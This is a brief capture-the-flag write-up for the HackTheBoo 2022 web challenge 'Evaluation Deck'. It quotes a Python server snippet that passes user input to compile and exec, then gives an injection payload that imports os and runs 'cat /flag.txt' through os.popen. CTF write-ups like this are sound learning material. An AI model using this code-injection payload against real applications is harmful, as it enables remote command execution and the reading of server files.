Web - Evaluation Deck
2022 HTB HackTheBoo CTF - Web - Evaluation Deck Writeup
code = compile(f'result = {int(current_health)} {operator} {int(attack_power)}', '<string>', 'exec')
exec(code, result) #This is the target
return response(result.get('result')); import os; f = os.popen(r'cat /flag.txt').read(); result = f#Last updated